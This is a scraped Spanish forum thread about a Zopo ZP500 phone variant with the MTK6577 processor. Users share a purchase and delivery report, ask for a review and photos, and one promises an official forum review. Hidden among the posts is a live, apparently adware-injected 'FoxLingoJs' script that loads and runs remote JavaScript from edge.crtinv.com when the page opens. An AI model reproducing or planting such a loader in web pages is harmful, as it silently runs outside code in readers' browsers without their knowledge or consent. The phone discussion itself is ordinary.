Zopo anuncia una nueva version del ZP 500 con el con el micro MTK6577

Pues ya te puedo contar exactamente. Compré el 26 de agosto, ZP500+Batería+Funda, ayer 30 ya lo tenía en mi casa. Yo lo pagué mediante paypal.

seria bueno ke nos hiciera un review de kmo es ese celu ke experiencias has tenido con el kmo llego todo eso cuanto dura la bateria.... por hay en 2 semanitas!! y nos puestre unas buenas fotikos!! :blush:
 
seria bueno ke nos hiciera un review de kmo es ese celu ke experiencias has tenido con el kmo llego todo eso cuanto dura la bateria.... por hay en 2 semanitas!! y nos puestre unas buenas fotikos!! :blush:

Hola, yo voy a hacer la review oficial del foro en unos dias, cuando me llegue el zopo500.


Saludos.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 

Del blog

Es tendencia

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba